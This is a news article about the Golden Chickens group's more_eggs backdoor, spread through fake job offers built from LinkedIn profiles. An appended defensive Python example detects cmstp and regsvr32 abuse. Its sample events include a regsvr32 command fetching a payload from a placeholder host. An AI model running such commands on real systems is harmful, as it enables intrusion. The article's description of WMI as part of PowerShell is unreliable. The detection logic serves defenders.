Top cybercrime gangs use targeted fake job offers to deploy stealthy backdoor


A group of criminals behind a stealthy backdoor known as more_eggs is targeting professionals with fake job offers tailored to them based on information from their LinkedIn profiles. The gang is selling access to systems infected with the backdoor to other sophisticated cybercrime groups including FIN6, Evilnum and Cobalt Group that are known to target organizations from various industries.

Spear phishing with LinkedIn info

In a recent attack detected by researchers from managed detection and response firm eSentire, the hackers targeted a professional working in the healthcare technology industry with a phishing email mimicking a job offer for a position identical to the one the target had listed on their LinkedIn profile page. This seems to be a technique that this group, known in the security industry as the Golden Chickens, has also used in the past.

The rogue emails contain a zip file that’s named after the job position the email offers. If opened, it starts a malicious component known as VenomLNK, which serves as the first stage in the more_eggs infection.

“Golden Chickens sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cybercriminals,” eSentire’s research team said in its report. “Once more_eggs is on the victim’s computer system, the Golden Eggs seedy customers can go in and infect the system with any type of malware: ransomware, credential stealers, banking malware, or simply use the backdoor as a foothold into the victim’s network so as to exfiltrate data.”

The infection chain

Once executed on a victim’s machine, VenomLNK uses Windows Management Instrumentation (WMI), a subsystem of PowerShell, to deploy the attack’s second stage: a malware loader known as TerraLoader.

TerraLoader hijacks two legitimate Windows processes, cmstp and regsvr32, to load the final payload, called TerraPreter, which is downloaded from servers hosted on Amazon AWS to evade possible network filters and is deployed as an ActiveX control. ActiveX is a framework that allows code execution through Internet Explorer and is supported natively on Windows.
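The chain above (a WMI-launched loader that then abuses cmstp and regsvr32 to pull a payload from a remote server) gives a defender three process-creation patterns worth alerting on. The following triage logic is an added example, not code from the article or from eSentire; the event fields, the script-host list, the user-writable directory pattern and the sample telemetry are all assumptions constructed for the demo.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    image: str         # full path of the new process
    parent_image: str  # full path of its parent
    cmdline: str       # command line of the new process

# LOLBins the article says TerraLoader abuses, plus common script hosts (assumed list).
ABUSED_BINARIES = {"cmstp.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
WMI_HOST = "wmiprvse.exe"  # parent of processes launched through WMI
URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(AppData\\Local\\Temp|Downloads|Public)\\", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def triage(ev: ProcEvent) -> list[str]:
    """Return the names of every heuristic the event trips (empty list = nothing suspicious)."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    hits = []
    # Stage 2: a process launched through WMI that is itself a LOLBin or script host.
    if parent == WMI_HOST and image in ABUSED_BINARIES | SCRIPT_HOSTS:
        hits.append("wmi-spawned-lolbin")
    # Stage 3: cmstp/regsvr32 handed a remote URL, i.e. the payload is fetched at run time.
    if image in ABUSED_BINARIES and URL_RE.search(ev.cmdline):
        hits.append("lolbin-remote-url")
    # cmstp/regsvr32 fed an input file from a user-writable directory (e.g. an extracted zip).
    if image in ABUSED_BINARIES and USER_WRITABLE_RE.search(ev.cmdline):
        hits.append("lolbin-user-writable-input")
    return hits

# Constructed sample telemetry for the demo (not from the article or from eSentire's report).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"regsvr32.exe /s /i:https://example.invalid/stage3"),
    ProcEvent(r"C:\Windows\System32\cmstp.exe", r"C:\Windows\System32\cmd.exe",
              r"cmstp.exe /ni /s C:\Users\victim\AppData\Local\Temp\Senior_Engineer.inf"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Program Files\Vendor\setup.exe",
              r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"),
]

def find_suspicious(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> tripped heuristics, keeping only events that tripped at least one."""
    return {i: hits for i, ev in enumerate(events) if (hits := triage(ev))}
```

Running `find_suspicious(SAMPLE_EVENTS)` flags the first two constructed events and leaves the vendor installer's regsvr32 call alone; in production the same checks would be fed from Sysmon event 1 or equivalent EDR process-creation telemetry.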

Copyright © 2021 IDG Communications, Inc.
